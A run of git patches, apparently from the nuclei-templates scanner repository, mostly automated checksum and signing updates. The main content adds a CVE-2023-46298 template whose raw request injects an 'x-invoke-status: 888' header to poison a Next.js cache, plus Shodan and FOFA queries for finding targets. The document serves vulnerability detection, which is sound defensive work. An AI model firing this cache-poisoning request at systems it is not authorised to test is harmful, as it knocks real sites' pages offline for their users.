1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index adea03549f..fd95891edc 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -41,3 +41,4 @@ http: - 'status_code == 200' - 'contains_all(body,"Business Directory","No listings found")' condition: and +# digest: 4b0a00483046022100e04251201f1f578148c87851a0d69f7f4eee73c7f9d22c66c87ac3844b5cd1d8022100f7ca58462cb7d8fb264834a0e6477dc1cf7a0160dd2356e11573da802e5455ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 25628fdfad4b2e37d4c657024b587ce9a9092693 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:06:44 +0000 Subject: [PATCH 0589/1841] Auto Generated Templates Checksum [Tue Jun 25 08:06:44 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5ac98eba62..098c36c351 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3431,7 +3431,7 @@ http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 -http/cves/2024/CVE-2024-4443.yaml:0a95192b7f74a14c6328203e9dd2f22b3b61cfd6 +http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c @@ -4062,7 +4062,7 @@ http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5 http/exposed-panels/ibm/ibm-maximo-login.yaml:5dce11ac4ba10a7c2b8193a6b5f9879740475f79 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd -http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23 +http/exposed-panels/ibm/ibm-odm-panel.yaml:2347ae320a6d3fbade2b76af1a70ddf2643017fd http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8 http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4 http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06 @@ -8764,7 +8764,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6dd4861736a3f1174f86a88cad5c0017aae67084 +templates-checksum.txt:5d8831af277281d68bc5d285b348449802805965 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b2ca362b196a202aeaf81883f444171fbb9c518a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:08:17 +0000 Subject: [PATCH 0591/1841] Auto Generated Templates Checksum [Tue Jun 25 08:08:17 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 098c36c351..dd2dc4ecd2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4064,7 +4064,7 @@ http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd http/exposed-panels/ibm/ibm-odm-panel.yaml:2347ae320a6d3fbade2b76af1a70ddf2643017fd http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8 -http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4 +http/exposed-panels/ibm/ibm-service-assistant.yaml:858b72148799ea91ab816b1e8a507ce17dcd2128 http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06 http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438 http/exposed-panels/ibm-openadmin-panel.yaml:8623f426863fc3bc20d57b1ee52bc63db920584d @@ -8764,7 +8764,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5d8831af277281d68bc5d285b348449802805965 +templates-checksum.txt:679444e93ad3e03a61e81aea985e13c4bdef7a2c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 264f696ef04b4636ee823a5e4f7760dd3fd0173c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:08:23 +0000 Subject: [PATCH 0592/1841] Auto Template Signing [Tue Jun 25 08:08:23 UTC 2024] :robot: --- http/exposed-panels/ibm/ibm-odm-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index 97dbc11794..820996d030 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -41,3 +41,4 @@ http: group: 1 regex: - '(?i)"js/dist/([0-9.]+)/decisioncenter"' +# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bba2c4e5dfb0b9ce2593f09f09dab18592dd8833 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:09:46 +0000 Subject: [PATCH 0593/1841] Auto Generated Templates Checksum [Tue Jun 25 08:09:46 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dd2dc4ecd2..4e0e4fe8eb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3424,6 +3424,7 @@ http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff +http/cves/2024/CVE-2024-36527.yaml:4217b2ebd25b6ddc00652725f0789fbf6bcee4cf http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -4062,7 +4063,7 @@ http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5 http/exposed-panels/ibm/ibm-maximo-login.yaml:5dce11ac4ba10a7c2b8193a6b5f9879740475f79 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd -http/exposed-panels/ibm/ibm-odm-panel.yaml:2347ae320a6d3fbade2b76af1a70ddf2643017fd +http/exposed-panels/ibm/ibm-odm-panel.yaml:c201719bc4a6f7da71c88c5dc90ac7d392beb564 http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8 http/exposed-panels/ibm/ibm-service-assistant.yaml:858b72148799ea91ab816b1e8a507ce17dcd2128 http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06 @@ -8764,7 +8765,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:679444e93ad3e03a61e81aea985e13c4bdef7a2c +templates-checksum.txt:5baecc601c886413c3ac3a85f9323864854ddce0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 54cdeeee17307539607caa808e4ac5263d096451 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 08:11:43 +0000 Subject: [PATCH 0594/1841] Auto Template Signing [Tue Jun 25 08:11:43 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36527.yaml | 1 + http/exposed-panels/ibm/ibm-service-assistant.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-36527.yaml b/http/cves/2024/CVE-2024-36527.yaml index 0bd39d6ad5..a007b58235 100644 --- a/http/cves/2024/CVE-2024-36527.yaml +++ b/http/cves/2024/CVE-2024-36527.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022013c982e61cebb23f2b135c2c6217fc117c36dd1f7319f5c9a4ddb1c29b4b1dfd022100c1592cd46ccdc9192bec332e0170e09c5eb0dff7288f54f82bab302a9da281cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ibm/ibm-service-assistant.yaml b/http/exposed-panels/ibm/ibm-service-assistant.yaml index dbf164ab65..76a6b815f3 100644 --- a/http/exposed-panels/ibm/ibm-service-assistant.yaml +++ b/http/exposed-panels/ibm/ibm-service-assistant.yaml @@ -37,3 +37,4 @@ http: regex: - '(?i)([a-z0-9\s]+)\s+Service\s+Assistant\s+Tool' - '(?i)svcProductMtm\s+=\s+.?([0-9a-z\-]+).?' +# digest: 4a0a00473045022079d9a047efcaee0a40d341686c75328b50214b585d11dd4dffc2bf4d1b0e1b48022100bee2fc7e989a65d47d6211d26d407b2054e56b7e02ffeb5ee3e320d707afa1ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 254785f197dd1f702cb84c02aa0e2e1a2698703a Mon Sep 17 00:00:00 2001 From: Ice3man Date: Tue, 25 Jun 2024 14:30:40 +0530 Subject: [PATCH 0595/1841] Create nextjs-cache-poisoning.yaml --- http/technologies/nextjs-cache-poisoning.yaml | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/technologies/nextjs-cache-poisoning.yaml diff --git a/http/technologies/nextjs-cache-poisoning.yaml b/http/technologies/nextjs-cache-poisoning.yaml new file mode 100644 index 0000000000..5fd84189f5 --- /dev/null +++ b/http/technologies/nextjs-cache-poisoning.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-46298 + +info: + name: Next.js Cache Poisoning + author: ice3man + severity: high + description: | + Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses. + reference: + - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13 + - https://github.com/valentin-panov/nextjs-no-cache-issue + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2023-46298 + epss-score: 0.00049 + epss-percentile: 0.18429 + cpe: cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* + metadata: + vendor: vercel + product: next.js + framework: node.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + +http: + - raw: + - | + GET /?cb={{rand_text_numeric(5)}} HTTP/1.1 + Host: {{Hostname}} + Priority: u=1 + x-invoke-status: 888 + + - | + GET /?cb={{rand_text_numeric(5)}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_1 == 888 && contains(body_1, '/_error')" + - "status_code_2 == 888 && contains(body_2, '/_error')" + condition: and From 21db40d11cc0a5ad425dee17781c348c314789d6 Mon Sep 17 00:00:00 2001 From: abut0n Date: Tue, 25 Jun 2024 11:02:24 +0200 Subject: [PATCH 0596/1841] Solve FN --- http/cves/2020/CVE-2020-27838.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 9d20ad4ad7..91127651bc 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -46,10 +46,9 @@ http: matchers-condition: and matchers: - - type: word - part: body - words: - - '"clientId":"security-admin-console"' + - type: regex + regex: + - '"clientId":\s*"security-admin-console"' - '"secret":' condition: and From 5a5021edb9b92dfa8e0c09e30a3f465563c161e9 Mon Sep 17 00:00:00 2001 From: Ice3man Date: Tue, 25 Jun 2024 14:38:39 +0530 Subject: [PATCH 0597/1841] Update nextjs-cache-poisoning.yaml --- http/technologies/nextjs-cache-poisoning.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/http/technologies/nextjs-cache-poisoning.yaml b/http/technologies/nextjs-cache-poisoning.yaml index 5fd84189f5..1d5cddcd31 100644 --- a/http/technologies/nextjs-cache-poisoning.yaml +++ b/http/technologies/nextjs-cache-poisoning.yaml @@ -1,8 +1,9 @@ + id: CVE-2023-46298 info: name: Next.js Cache Poisoning - author: ice3man + author: ProjectDiscoveryAI severity: high description: | Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses. @@ -25,16 +26,19 @@ info: - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" +variables: + rand: "{{rand_text_numeric(5)}}" + http: - raw: - | - GET /?cb={{rand_text_numeric(5)}} HTTP/1.1 + GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} Priority: u=1 x-invoke-status: 888 - | - GET /?cb={{rand_text_numeric(5)}} HTTP/1.1 + GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} matchers: From c036aaf9c845c319c1cff34fc251369674891ca6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 25 Jun 2024 13:12:36 +0400 Subject: [PATCH 0598/1841] updated wordpress github action --- .github/scripts/wordpress-plugins-update.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 4d57c1873b..2a05e76c35 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -124,7 +124,6 @@ info: http: - method: GET - path: - "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt" @@ -171,7 +170,7 @@ http: if not os.path.exists(template_dir): os.makedirs(template_dir) - helper_path = f"helpers/wordpress/plugins/{name}.txt" + helper_path = f"{work_dir}/helpers/wordpress/plugins/{name}.txt" version_file = open(helper_path, "w") version_file.write(version) version_file.close() From 14309dcc5ca14cbb558bb723a4675ca785d96abd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 14:45:49 +0530 Subject: [PATCH 0599/1841] fix trail space --- http/technologies/nextjs-cache-poisoning.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/nextjs-cache-poisoning.yaml b/http/technologies/nextjs-cache-poisoning.yaml index 1d5cddcd31..becebb1c7f 100644 --- a/http/technologies/nextjs-cache-poisoning.yaml +++ b/http/technologies/nextjs-cache-poisoning.yaml @@ -1,9 +1,8 @@ - id: CVE-2023-46298 info: name: Next.js Cache Poisoning - author: ProjectDiscoveryAI + author: Ice3man543 severity: high description: | Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses. @@ -25,6 +24,7 @@ info: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" + tags: cve,cve2023,next-js,cache variables: rand: "{{rand_text_numeric(5)}}" From c5d2fe670fdc3c4c4734991380604cfd86f61400 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 14:50:06 +0530 Subject: [PATCH 0600/1841] Update and rename http/technologies/nextjs-cache-poisoning.yaml to http/cves/2023/CVE-2023-46298.yaml --- .../2023/CVE-2023-46298.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/{technologies/nextjs-cache-poisoning.yaml => cves/2023/CVE-2023-46298.yaml} (99%) diff --git a/http/technologies/nextjs-cache-poisoning.yaml b/http/cves/2023/CVE-2023-46298.yaml similarity index 99% rename from http/technologies/nextjs-cache-poisoning.yaml rename to http/cves/2023/CVE-2023-46298.yaml index becebb1c7f..0aa9402dbc 100644 --- a/http/technologies/nextjs-cache-poisoning.yaml +++ b/http/cves/2023/CVE-2023-46298.yaml @@ -28,7 +28,7 @@ info: variables: rand: "{{rand_text_numeric(5)}}" - + http: - raw: - | From 99a691b18588ff34851d284bd68d07aa03f9833c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 09:51:35 +0000 Subject: [PATCH 0601/1841] Auto Generated New Template Addition List [Tue Jun 25 09:51:35 UTC 2024] :robot: --- .new-additions | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/.new-additions b/.new-additions index 7c1714e737..38bc7b2df7 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,38 @@ cloud/aws/sns/sns-public-subscribe-access.yaml +cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml +cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml +cloud/kubernetes/deployments/k8s-default-namespace-used.yaml +cloud/kubernetes/deployments/k8s-host-ports-check.yaml +cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml +cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml +cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml +cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml +cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml +cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml +cloud/kubernetes/deployments/k8s-privileged-container.yaml +cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml +cloud/kubernetes/deployments/k8s-root-container-admission.yaml +cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml +cloud/kubernetes/kubernetes-code-env.yaml +cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml +cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml +cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml +cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml +cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml +cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml +cloud/kubernetes/pods/k8s-readonly-fs.yaml +cloud/kubernetes/pods/k8s-readonly-rootfs.yaml +cloud/kubernetes/pods/k8s-root-user-id.yaml +cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml +cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml +cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml +cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml +cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml +cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml +cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml +cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml +cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml dast/vulnerabilities/sqli/time-based-sqli.yaml file/malware/hash/anthem-deeppanda-malware-hash.yaml file/malware/hash/applejeus-malware-hash.yaml @@ -102,6 +136,7 @@ http/cves/2024/CVE-2024-3274.yaml http/cves/2024/CVE-2024-34982.yaml http/cves/2024/CVE-2024-3552.yaml http/cves/2024/CVE-2024-36412.yaml +http/cves/2024/CVE-2024-36527.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml http/cves/2024/CVE-2024-3922.yaml From 5e4879b732b00b08fa4d608c21ad27173ae415cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 09:51:45 +0000 Subject: [PATCH 0602/1841] Auto Generated Templates Checksum [Tue Jun 25 09:51:45 UTC 2024] :robot: --- templates-checksum.txt | 41 ++++++++++++++++++++++++++++++++++++++--- 1 file changed, 38 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4e0e4fe8eb..f06478f233 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -107,6 +107,40 @@ cloud/enum/gcp-app-engine-enum.yaml:735d4025743533df111b8bee9132eb2503019b92 cloud/enum/gcp-bucket-enum.yaml:954d5a61d8cceec64101392998396f4c48cb94c4 cloud/enum/gcp-firebase-app-enum.yaml:3fd3b413096838d123d31f2a7e3ccb02bc74dd73 cloud/enum/gcp-firebase-rtdb-enum.yaml:4bd510aa205a80e5b9db5572b16b90949d898842 +cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml:27be4204fdb7bda8d0b50115111a618aee85309b +cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml:69eab9d30b26e40ffd8bbe6c7ebcd3d98558177d +cloud/kubernetes/deployments/k8s-default-namespace-used.yaml:4af557093ab9b0433b98bc913876d5e160e30f85 +cloud/kubernetes/deployments/k8s-host-ports-check.yaml:98a9885144fd3119243dd1d22390c38d881f278e +cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml:19ce8cfe69ecc38b10d9d0d960e51da6a8ee8f8f +cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml:1bb4778a8c5c4d4b04b00f0f8616e4cd427fbd84 +cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml:d1edb4a457f26b17d826837196846b937360a389 +cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml:64435439d85ae23c7662bc88444397def9d49f9d +cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml:82bc234d45f417c646612bbbbea1869f75467243 +cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml:bbe067d8b4a85bc01a7ca4c1a17b2bafe0f53c47 +cloud/kubernetes/deployments/k8s-privileged-container.yaml:23223b34880c3a44dd897d7ee68d6edfddea32f2 +cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml:c42a606274e45058edaf0fb221293f9cdb2c1908 +cloud/kubernetes/deployments/k8s-root-container-admission.yaml:9a6bec6cd2caf0c2cd95ee35afb8d5b75c0bb613 +cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml:d82e9a10f97c52b015974536a7ee8ca05120d235 +cloud/kubernetes/kubernetes-code-env.yaml:1ef357323b24d5477c4b24be0555f4c328ce7d13 +cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml:9405572b0dffa908f828a1fb124b2bdbae9e5cad +cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml:529ba1c07c7c5e4d630c58966b6047ad995412a3 +cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml:3dd407fd0f9ac4ac1503876951018e2c4dc97266 +cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml:3d32959ad5728498163d5b1d444bdd4931e6b71c +cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml:7f1e720cac222017ab9a2d77972273ab22003b8b +cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml:f7bfc964fdf51ad1a66de068800e6ec4635be367 +cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml:86686d3fd919745a4d0bf4a5aa113364fbdcbf21 +cloud/kubernetes/pods/k8s-readonly-fs.yaml:6830b06adc4ea9bdef9f1d0e97c47c8333ca5f24 +cloud/kubernetes/pods/k8s-readonly-rootfs.yaml:2daf08d1c9326bc2a5b192777de464c8d4652388 +cloud/kubernetes/pods/k8s-root-user-id.yaml:94c464a272031c5b5c84bc3719d9590d666aabc0 +cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml:4fbf070d8382d41b34c177995b6a9a967c010470 +cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml:a8bf7f3947ca0a330557b70ff348ec842551ad67 +cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml:280725576fa47e63ebf9561a74f9287b4bb65b05 +cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml:c9e3a2041c02eac22ea359af120989b5c6532e98 +cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml:ee7084f1540cfab7647ea76d5b9a1a1d58c08e68 +cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml:a9cd19b005d52ffa783f2e4f8ed81f20b660d91c +cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml:22239f1645a99409f164a9379a19c28366458427 +cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml:6bb14c710820de370ea54ea58755bc77b6725604 +cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml:c19b97609ac053a8bf58f63c2db3558247a00bf7 code/cves/2019/CVE-2019-14287.yaml:4bac98e672bcc82f1fdb764079e0c1b087e59b12 code/cves/2021/CVE-2021-3156.yaml:4df2c2fa45f3503655f6ed1b743668b82afda3f5 code/cves/2023/CVE-2023-2640.yaml:08c6ebd7086926c0712bc1ecc78353604883a385 @@ -3424,7 +3458,7 @@ http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff -http/cves/2024/CVE-2024-36527.yaml:4217b2ebd25b6ddc00652725f0789fbf6bcee4cf +http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -4065,7 +4099,7 @@ http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd http/exposed-panels/ibm/ibm-odm-panel.yaml:c201719bc4a6f7da71c88c5dc90ac7d392beb564 http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8 -http/exposed-panels/ibm/ibm-service-assistant.yaml:858b72148799ea91ab816b1e8a507ce17dcd2128 +http/exposed-panels/ibm/ibm-service-assistant.yaml:97288e394d850dc4b40b0836d3e6518727a8f3de http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06 http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438 http/exposed-panels/ibm-openadmin-panel.yaml:8623f426863fc3bc20d57b1ee52bc63db920584d @@ -8728,6 +8762,7 @@ profiles/cloud.yml:3133844636ed8272a455c69b86bb7b6bc6f02af7 profiles/compliance.yml:2a4e9c29796e498b4a9129572bd57f8652fe2c0c profiles/cves.yml:2c2976ffcead9f014a5933dd6718f4e7ef4a74c2 